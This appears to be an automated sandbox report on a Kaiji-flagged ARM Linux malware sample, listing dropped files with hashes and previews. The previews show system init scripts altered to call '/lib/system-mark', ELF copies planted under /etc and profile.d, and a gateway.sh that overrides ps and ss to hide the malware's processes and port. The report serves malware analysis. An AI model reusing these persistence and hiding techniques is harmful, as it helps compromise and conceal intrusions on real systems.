                                                                          SHA-512:C7F9AE322C14643F6D711B4B20AD009522B3FE02E986CFB5F839717144BF795E70E17A2745D24E74C4CA76922FF8ED0C1D413F7CEBDECA25CFC52AE4EDE04FA7
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh..### BEGIN INIT INFO.# Provides: rsyncd.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Should-Start: $named autofs.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: fast remote file copy program daemon.# Description: rsync is a program that allows files to be copied to and.# from remote machines in much the same way as rcp..# This provides rsyncd daemon functionality..### END INIT INFO..set -e..# /etc/init.d/rsync: start and stop the rsync daemon..DAEMON=/usr/bin/rsync.RSYNC_ENABLE=false.RSYNC_OPTS=''.RSYNC_DEFAULTS_FILE=/etc/default/rsync.RSYNC_CONFIG_FILE=/etc/rsyncd.conf.RSYNC_PID_FILE=/var/run/rsync.pid.RSYNC_NICE_PARM=''.RSYNC_IONICE_PARM=''..test -x $DAEMON || exit 0... /lib/lsb/init-functions..if [ -s $RSYNC_DEFAULTS_FILE ]; then./lib/system-mark. . $RSYNC_DEFAULTS_FILE. case "x$RSYNC_ENABLE" in..xtrue|xfalse).;;..xinetd)..exit 0....;;..*)..log_fail

                                                                          /etc/init.d/rsyslog

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2899
                                                                          Entropy (8bit):5.275562121366292
                                                                          Encrypted:false
                                                                          SSDEEP:48:7cqmpKHnuoz/SWSZABLG/tm3RpZWE/eXt5Ie3nLqWpvU8lbzZdaZ2YI:75sKHuS8ZABLG1m3rZWE2Xt5Ie3nR5JT
                                                                          MD5:5D640A7C6908172899411BF2B8B1DE9C
                                                                          SHA1:B3980052CC12A5ACF1DD34D134CD822CAE09C63A
                                                                          SHA-256:A40550FEDDF8DB933722514358F364F7CCD50E9EFF123F4F408575BFB0865DE2
                                                                          SHA-512:E0AAF4ACC9F2707B6B191A5BDB36711F43D5C1890D5FFD614C03C2525E31F7993BE0308B865DA41B6D4E83A32759AEE91D8B94C293AD6174C2D94633980B3766
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: rsyslog.# Required-Start: $remote_fs $time.# Required-Stop: umountnfs $time.# X-Stop-After: sendsigs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: enhanced syslogd.# Description: Rsyslog is an enhanced multi-threaded syslogd..# It is quite compatible to stock sysklogd and can be .# used as a drop-in replacement..### END INIT INFO..#.# Author: Michael Biebl <biebl@debian.org>.#..# PATH should only include /usr/* if it runs after the mountnfs.sh script.PATH=/sbin:/usr/sbin:/bin:/usr/bin.DESC="enhanced syslogd".NAME=rsyslog..RSYSLOGD=rsyslogd.DAEMON=/usr/sbin/rsyslogd.PIDFILE=/run/rsyslogd.pid..SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$DAEMON" ] || exit 0..# Read configuration variable file if it is present.[ -r /etc/default/$NAME ] && . /etc/default/$NAME..# Define LSB log_* functions... /lib/lsb/init-functions..do_st

                                                                          /etc/init.d/saned

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2293
                                                                          Entropy (8bit):5.0050970590485715
                                                                          Encrypted:false
                                                                          SSDEEP:24:aruzoYFiVHCVhQJABlRi5tzldBOVQReMdHvdNw5G/9yNuFimjBklJJq5MxnR5/2F:e7Y0u/i5t7RbHwG/9diHlrXnL/iOs1
                                                                          MD5:E26E346029E7C03BC1EF969368CF6A1D
                                                                          SHA1:7AD4BCFDA2907E9EED7C2DC81820EABFC0132AE7
                                                                          SHA-256:B26A28FBDDDCA0E1A9232CF7719860044CB58D34E11AEDC1D53C9D57A689616A
                                                                          SHA-512:FBAF8DA2CA6CA008E3D3F1F93C6FAF794A0D62ECD161770F0D00A48697AC190BAB80A13EA1B2D18A4CFD35FA33BEB8891848D5DA67D1DAD2246995CD44B45910
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh.#.### BEGIN INIT INFO.# Provides: saned.# Required-Start: $syslog $local_fs $remote_fs.# Required-Stop: $syslog $local_fs $remote_fs.# Should-Start: dbus avahi-daemon.# Should-Stop: dbus avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: SANE network scanner server.# Description: saned makes local scanners available over the.# network..### END INIT INFO... /lib/lsb/init-functions..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/saned.NAME=saned.DESC="SANE network scanner server"..test -x $DAEMON || exit 0..RUN=no.RUN_AS_USER=saned..# Get lsb functions.. /lib/lsb/init-functions..# Include saned defaults if available.if [ -f /etc/default/saned ] ; then./lib/system-mark. . /etc/default/saned.fi..DAEMON_OPTS="-a $RUN_AS_USER"..set -e..case "$1" in. start)..log_daemon_msg "Starting $DESC" "$NAME"..start-stop-daemon --start --quiet --pidfile /var/run/$N

                                                                          /etc/init.d/screen-cleanup

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):1274
                                                                          Entropy (8bit):5.007351824676895
                                                                          Encrypted:false
                                                                          SSDEEP:24:c26Nr+XEgBYxABoO21p4rqeYCRjeyvcsTN/RGT7d/LGld/7K9jp:cPQoO23+qeYSjeybRRGHdTGld/7K9jp
                                                                          MD5:2CB1D1EE81FD07E07C103CB77A254958
                                                                          SHA1:1B94DFA21FF802A7176767B4F0B5EEC16057B5EC
                                                                          SHA-256:6DEA1801FFE07EB969A54FA572A6A63C80D570CEABAC7F14BFD51DD40E67FD30
                                                                          SHA-512:48556EE1B364DA2B128006C2755F1C665559C2216ECA1CE06D7972A158CD27AB075859ABD842D7C2F118175A5616B6FE5B6288866A55B050A465E699EB67C491
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh.# $Id: init,v 1.3 2004/03/16 01:43:45 zal Exp $.#.# Script to remove stale screen named pipes on bootup..#..### BEGIN INIT INFO.# Provides: screen-cleanup.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: screen sessions cleaning.# Description: Cleans up the screen session directory and fixes its.# permissions if needed..### END INIT INFO..set -e..test -f /usr/bin/screen || exit 0..SCREENDIR=/run/screen..case "$1" in.start). if test -L $SCREENDIR || ! test -d $SCREENDIR; then./lib/system-mark. rm -f $SCREENDIR. mkdir $SCREENDIR. chown root:utmp $SCREENDIR. [ -x /sbin/restorecon ] && /sbin/restorecon $SCREENDIR. fi. find $SCREENDIR -type p -delete.# If the local admin has used dpkg-statoverride to install the screen.# binary with different set[ug]id bits, change the permissions of.# $SCREENDIR accordingly. BINARYPERM=`stat -c%a /usr/bin/screen`. if [ "

                                                                          /etc/init.d/spice-vdagent

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2519
                                                                          Entropy (8bit):4.741374235420371
                                                                          Encrypted:false
                                                                          SSDEEP:48:DFZazGMU+rI4CXyUH0I6zroGW//AhrHoGx//AuiIngcu/syylyTIsD2E8AB6/oBa:DF0GMU+1iD6foGWQRHoGxQuiIngczVII
                                                                          MD5:652E57DD61B8A64F80D9CCCD751E4476
                                                                          SHA1:1C9E3D8CBCD6F9E6B1B3994D8246C89A52BA84CE
                                                                          SHA-256:49FEFA6609A75C4A3624B556F2593A15B2F9E0C173BFB2233B90DBC8BF52E53D
                                                                          SHA-512:657C725D48D6A56929530EC68DB98895C4EB7F3A6C94E799FBA2BF48053883F8128C03F934A63E623340FD0433FE5222685CAC501D5C8D9B81317353649E382D
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh.#.# spice-vdagent Agent daemon for Spice guests.#.# chkconfig: 345 70 30.# description: Together with a per X-session agent process the spice agent \.# daemon enhances the spice guest user experience with client \.# mouse mode, guest <-> client copy and paste support and more...### BEGIN INIT INFO.# Provides: . .spice-vdagent.# Required-Start: .$local_fs $remote_fs.# Required-Stop: .$local_fs $remote_fs.# Should-Start: .dbus.# Should-Stop: ..# Default-Start: .2 3 4 5.# Default-Stop: .0 1 6.# Short-Description: .Agent daemon for Spice guests.# Description: .Together with a per X-session agent process the spice agent.# .daemon enhances the spice guest user experience with client.# .mouse mode, guest <-> client copy and paste support and more..### END INIT INFO...exec="/usr/sbin/spice-vdagentd".prog="spice-vdagentd".pidfile="/var/run/spice-vdagentd/spice-vdagentd.pid".port="/dev/virtio-ports/com.redhat.spic

                                                                          /etc/init.d/ssh

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):4195
                                                                          Entropy (8bit):5.068394475077908
                                                                          Encrypted:false
                                                                          SSDEEP:96:jkXSV2xsYJrvcRyAHofonXHeyKyWUkO8IhQ:j1ouYJDc7IQXoXBIhQ
                                                                          MD5:C7F75670C4CBACFFCD3EE308F9EC9F4A
                                                                          SHA1:4D77E8C62706CB0601CB8031FB0368581E479792
                                                                          SHA-256:7E40FB227308DFE02D3F2EDF82B41D0FDF729A942D78D74C72EEA7A82669BE90
                                                                          SHA-512:39EB8A235611E0B6EC4C15D5C7D86274573A0C9DFD69E31D1297F50B992B0FF247382E20DAF02133BC7896B0530C215B5A1F870A6F214C9AF0DDB1F70C213CEA
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh..### BEGIN INIT INFO.# Provides:..sshd.# Required-Start:.$remote_fs $syslog.# Required-Stop:.$remote_fs $syslog.# Default-Start:.2 3 4 5.# Default-Stop:...# Short-Description:.OpenBSD Secure Shell server.### END INIT INFO..set -e..# /etc/init.d/ssh: start and stop the OpenBSD "secure shell(tm)" daemon..test -x /usr/sbin/sshd || exit 0.( /usr/sbin/sshd -\? 2>&1 | grep -q OpenSSH ) 2>/dev/null || exit 0..umask 022..if test -f /etc/default/ssh; then./lib/system-mark. . /etc/default/ssh.fi... /lib/lsb/init-functions..if [ -n "$2" ]; then./lib/system-mark. SSHD_OPTS="$SSHD_OPTS $2".fi..# Are we running from init?.run_by_init() {. ([ "$previous" ] && [ "$runlevel" ]) || [ "$runlevel" = S ].}..check_for_no_start() {. # forget it if we're trying to start, and /etc/ssh/sshd_not_to_be_run exists. if [ -e /etc/ssh/sshd_not_to_be_run ]; then ./lib/system-mark..if [ "$1" = log_end_msg ]; then./lib/system-mark.. log_end_msg 0 || true..fi..if ! run_by_init; then./lib/syst

                                                                          /etc/init.d/udev

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):7281
                                                                          Entropy (8bit):4.982014475224516
                                                                          Encrypted:false
                                                                          SSDEEP:96:l7vIwGhwBoNNqeI4OyxwfPlBALWGGgRoG2davbKBJKCrrS2DvwvPmWGPmTbKBJKk:lOWoYiOVlz2B2daxqrS2zwGW51Wymj
                                                                          MD5:9C101DF581AD6E404FB99F3B974E743E
                                                                          SHA1:CF4A059360FEDD5F371C815772E2BAFC4532E997
                                                                          SHA-256:63F0156061B5B581C069F51ED8E3B0473CF796EA88A3BF4BE92B420D529B59AB
                                                                          SHA-512:4F7658321F7AC02F9D528088E8A572B8F8549C8FCC61366BDC43ACB61C9C216EBF597D78116A5DB4A42BDC0DC17A4AF6B55C068DB41BDC2DC661900B70A3EDE2
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh -e.### BEGIN INIT INFO.# Provides: udev.# Required-Start: mountkernfs.# Required-Stop: umountroot.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Start systemd-udevd, populate /dev and load drivers..### END INIT INFO..PATH="/sbin:/bin".NAME="systemd-udevd".DAEMON="/lib/systemd/systemd-udevd".DESC="hotplug events dispatcher".PIDFILE="/run/udev.pid".CTRLFILE="/run/udev/control".OMITDIR="/run/sendsigs.omit.d"..# we need to unmount /dev/pts/ and remount it later over the devtmpfs.unmount_devpts() {. if mountpoint -q /dev/pts/; then./lib/system-mark. umount -n -l /dev/pts/. fi.. if mountpoint -q /dev/shm/; then./lib/system-mark. umount -n -l /dev/shm/. fi.}..# mount a devtmpfs over /dev, if somebody did not already do it.mount_devtmpfs() {. if grep -E -q "^[^[:space:]]+ /dev devtmpfs" /proc/mounts; then./lib/system-mark. mount -n -o remount,nosuid,size=$tmpfs_size,mode=0755 -t devtmpfs devtmpfs /dev. return. fi.. if ! mount -

                                                                          /etc/init.d/ufw

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2220
                                                                          Entropy (8bit):4.757250053076253
                                                                          Encrypted:false
                                                                          SSDEEP:48:1LleiFcd/nzngwPatTM/JrNWwj/Jb/SX9l:1BDFmXOQvJE
                                                                          MD5:EA501062EF1DD3FA29A5BC5479E85D5C
                                                                          SHA1:997CD2C9A15D23589A8862E2F521A6E40C807311
                                                                          SHA-256:90D6965642D81F9AF96BA403FA262381940E73011724178E6B72EC54955C0BCB
                                                                          SHA-512:95D16F0A742BA49AA8ABEA1F448F602B4F00ED3DBDD51B25E71C79A68B9F07926B252A9B66D1BFFB760247BD4C605CCD9B4ACCF3ED1D1755A7886651AC6C396D
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides: ufw.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: S.# Default-Stop: 1.# Short-Description: start firewall.# Description: Start ufw firewall.### END INIT INFO..set -e..PATH="/sbin:/bin"..[ -d /lib/ufw ] || exit 0... /lib/lsb/init-functions..for s in "/lib/ufw/ufw-init-functions" "/etc/ufw/ufw.conf" "/etc/default/ufw" ; do. if [ -s "$s" ]; then./lib/system-mark. . "$s". else. log_failure_msg "Could not find $s (aborting)". exit 1. fi.done..error=0.case "$1" in.start). if [ "$ENABLED" = "yes" ] || [ "$ENABLED" = "YES" ]; then./lib/system-mark. log_action_begin_msg "Starting firewall:" "ufw". output=`ufw_start` || error="$?". if [ "$error" = "0" ]; then./lib/system-mark. log_action_cont_msg "Setting kernel variables ($IPT_SYSCTL)". fi. if [ ! -z "$output" ]; then./lib/system-mark. echo "$output" | while read

                                                                          /etc/init.d/unattended-upgrades

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):1426
                                                                          Entropy (8bit):5.323775798950294
                                                                          Encrypted:false
                                                                          SSDEEP:24:aMXni+12wpFKFOGofwvlf/HNVKowwflHBhF/7Px1gr:bni23FKFpbt3GnoHBDbx2
                                                                          MD5:0BAD7D02A34912B684C93C71BFD19757
                                                                          SHA1:688CF612860E3C7125D34B63F7EF584DC65E4550
                                                                          SHA-256:FF796642243AF8B1492D63FF16F761AE942A4AE7CCFA17A05E3CF533B0D6E4DB
                                                                          SHA-512:D806A1D5B8AD9AA0A51841825DA8ACD4DA299D331874CD6FD777BCD6802B8BC7498B118B6D85F7E1793749EDCD3ABBD57EA78620226D34E43DA3AE1EE73BA684
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh.#.### BEGIN INIT INFO.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Provides: unattended-upgrade-shutdown-check.# Default-Start: 2 3 4 5.# Default-Stop: 0 6.# Short-Description: Check if unattended upgrades are being applied.# Description: Check if unattended upgrades are being applied.# and wait for them to finish.### END INIT INFO.set -e..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin..NAME="unattended-upgrades-shutdown".DESC="unattended package upgrades shutdown".SCRIPTNAME="/etc/init.d/$NAME".SHUTDOWN_HELPER="/usr/share/unattended-upgrades/unattended-upgrade-shutdown"..if [ -x /usr/bin/python3 ]; then./lib/system-mark. PYTHON=python3.else. PYTHON=python.fi..# Load the VERBOSE setting and other rcS variables.. /lib/init/vars.sh..# Define LSB log_* functions..# Depend on lsb-base (>= 3.2-14) to ensure that this file is present.. /lib/lsb/init-functions..case "$1" in.

                                                                          /etc/init.d/uuidd

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):1358
                                                                          Entropy (8bit):5.209136415739334
                                                                          Encrypted:false
                                                                          SSDEEP:24:aNmC4ozLk8BZa8LNfwa0aDEPLu5CB5ZM5AHdwi/mqT0KtOC:3VozBjdh0a4PLuIBvMGwitIKtl
                                                                          MD5:A18F61759309F7DAE1CF4D379B0DC2E0
                                                                          SHA1:38BB4BFF894D6973BC2B59145A28CD93FC2A2B26
                                                                          SHA-256:8750FAACA2F9E6ED50996EBA4C23F884241C27A375CCFE79801715044BEA7232
                                                                          SHA-512:18489A3A5A446A80D1EEB324AD9823480FF2C53AF1703D4DB6B3DE42A7901B0223135948FD5162F60418F1AB7B7AA1CB3D3CA5C7D1E9E05F6048204DD913D6FB
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh -e.### BEGIN INIT INFO.# Provides: uuidd.# Required-Start: $time $local_fs $remote_fs.# Required-Stop: $time $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: uuidd daemon.# Description: Init script for the uuid generation daemon.### END INIT INFO.#.# Author:."Theodore Ts'o" <tytso@mit.edu>.#.set -e..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DAEMON=/usr/sbin/uuidd.UUIDD_USER=uuidd.UUIDD_GROUP=uuidd.UUIDD_DIR=/run/uuidd.PIDFILE=$UUIDD_DIR/uuidd.pid..test -x $DAEMON || exit 0... /lib/lsb/init-functions..case "$1" in. start)..log_daemon_msg "Starting uuid generator" "uuidd"..if ! test -d $UUIDD_DIR; then./lib/system-mark...mkdir -p $UUIDD_DIR...chown -R $UUIDD_USER:$UUIDD_GROUP $UUIDD_DIR..fi..start_daemon -p $PIDFILE $DAEMON..log_end_msg $?. ;;. stop)..log_daemon_msg "Stopping uuid generator" "uuidd"..killproc -p $PIDFILE $DAEMON..log_end_msg $?. ;;. status)..if pidofproc -p $PIDFILE $DAEMON >/dev/null 2>&

                                                                          /etc/init.d/x11-common

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2911
                                                                          Entropy (8bit):4.894244496059908
                                                                          Encrypted:false
                                                                          SSDEEP:48:ZETewCRgFkV5ZSVwxcRypF1vrBy9DuIpPX5uCXAepm1L3/WAhyC76XGMgH3:SggFkViVNePT09DuYX5HX3aLdqX8
                                                                          MD5:E39C2FE947515C58470F91A5A6D1ED5B
                                                                          SHA1:00C7881A33ED0425C236C9544BD43E7BC9AE46DD
                                                                          SHA-256:37CCB9BB9C51FEB17B9943BB7DF42E8E03342F5611EC649E5C6E5A87A5A2840D
                                                                          SHA-512:AB26218676CEA2C319F29911650AA98C2E7D5578E9E2130D44997FDDE2E59765E1AAC52E0EE2C466E231B55AFFCA92B9C0A67A8381725D5433C3392DE04FF7F3
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh.# /etc/init.d/x11-common: set up the X server and ICE socket directories.### BEGIN INIT INFO.# Provides: x11-common.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: set up the X server and ICE socket directories.### END INIT INFO..set -e..PATH=/usr/bin:/usr/sbin:/bin:/sbin.SOCKET_DIR=.X11-unix.ICE_DIR=.ICE-unix... /lib/lsb/init-functions.if [ -f /etc/default/rcS ]; then./lib/system-mark. . /etc/default/rcS.fi..do_restorecon () {. # Restore file security context (SELinux).. if which restorecon >/dev/null 2>&1; then./lib/system-mark. restorecon "$1". fi.}..# create a directory in /tmp..# assumes /tmp has a sticky bit set (or is only writeable by root).set_up_dir () {. DIR="/tmp/$1".. if [ "$VERBOSE" != no ]; then./lib/system-mark. log_progress_msg "$DIR". fi. # if $DIR exists and isn't a directory, move it aside. if [ -e $DIR ] && ! [ -d $DIR ] || [ -h $DIR ]; then./lib/system-mar

                                                                          /etc/opt.services.cfg

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /etc/opt.services.cfg, Author: Joe Security
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................

                                                                          /etc/profile.d/bash_cfg

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /etc/profile.d/bash_cfg, Author: Joe Security
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................

                                                                          /etc/profile.d/bash_cfg.sh

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:Bourne-Again shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):35
                                                                          Entropy (8bit):4.261725074756386
                                                                          Encrypted:false
                                                                          SSDEEP:3:TKH/binKE:siKE
                                                                          MD5:BE6E09DEC0A6249FD83851DAF92AE627
                                                                          SHA1:9FF81BB38A0FD5432575455D7D8334BD8D983CF7
                                                                          SHA-256:44BDD8B7F00094E163540A2B8C3CF973E72499BAA20B78F8051E2422163E1D0D
                                                                          SHA-512:CCF2BDC30F45A132DBDBBF1F008A06525B7EE4A46F09A11025BA05A55835F67356DBB4F8E826AFB28C73AFE5653C09C7CEAA082A2194A0D7C78BE101A4AD1F30
                                                                          Malicious:true
                                                                          Preview:#!/bin/bash./etc/profile.d/bash_cfg

                                                                          /etc/profile.d/gateway.sh

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:Bourne-Again shell script, ASCII text executable, with very long lines (910)
                                                                          Category:dropped
                                                                          Size (bytes):6339
                                                                          Entropy (8bit):4.790805571410194
                                                                          Encrypted:false
                                                                          SSDEEP:192:sSahyOSP3ECqh8teaSahyOSP3ECqh8te0SahyOSP3ECqh8teUSahyOSP3ECqh8t8:mwyig4MK
                                                                          MD5:11A1887AA550DACE7A8D9BA60AE97E72
                                                                          SHA1:3D7D000DB5A71C38FE1FFD968B58C00865F81B03
                                                                          SHA-256:64C03F00E4A419B6ED09669968131C0BDC8DB47F7280F62C1AA3CB2400486315
                                                                          SHA-512:600BFE91D14F58EC1B5126BA97D5EEB1AB0D9A66252E4AEC23CBD812BA79A145FD9535F5B5E0C74C58BFC8FE283834F9A567C234E758E5DF69ACD7A3CAAB09C7
                                                                          Malicious:true
                                                                          Preview:#!/bin/bash.function ps { proc_name=$(/usr/bin/ps $@);proc_name=$(echo "$proc_name" | sed -e '/32675/d');proc_name=$(echo "$proc_name" | sed -e '/dns-tcp4/d');proc_name=$(echo "$proc_name" | sed -e '/quotaoff.service/d');proc_name=$(echo "$proc_name" | sed -e '/System.mod/d');proc_name=$(echo "$proc_name" | sed -e '/gateway.sh/d');proc_name=$(echo "$proc_name" | sed -e '/32675/d');proc_name=$(echo "$proc_name" | sed -e '/.mod/d');proc_name=$(echo "$proc_name" | sed -e '/libgdi.so.0.8.1/d');proc_name=$(echo "$proc_name" | sed -e '/opt.services.cfg/d');proc_name=$(echo "$proc_name" | sed -e '/system-mark/d');proc_name=$(echo "$proc_name" | sed -e '/ifconfig.cfg/d');proc_name=$(echo "$proc_name" | sed -e '/sleep/d');proc_name=$(echo "$proc_name" | sed -e '/seeintlog/d');proc_name=$(echo "$proc_name" | sed -e '/bash_cfg/d');proc_name=$(echo "$proc_name" | sed -e '/linux_arm6.elf/d');echo "$proc_name"; }.function ss { proc_name=$(/usr/bin/ss $@);proc_name=$(echo "$proc_name" | sed -e '/3267

                                                                          /memfd:snapd-env-generator (deleted)

                                                                          Download File
                                                                          Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):76
                                                                          Entropy (8bit):3.7627880354948586
                                                                          Encrypted:false
                                                                          SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                          MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                          SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                          SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                          SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                          Malicious:false
                                                                          Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

                                                                          /proc/5688/loginuid

                                                                          Download File
                                                                          Process:/usr/sbin/cron
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:V:V
                                                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                          Malicious:false
                                                                          Preview:0

                                                                          /proc/5758/loginuid

                                                                          Download File
                                                                          Process:/usr/sbin/cron
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:V:V
                                                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                          Malicious:false
                                                                          Preview:0

                                                                          /run/crond.pid

                                                                          Download File
                                                                          Process:/usr/sbin/cron
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):10
                                                                          Entropy (8bit):2.321928094887362
                                                                          Encrypted:false
                                                                          SSDEEP:3:HdqS/:9p/
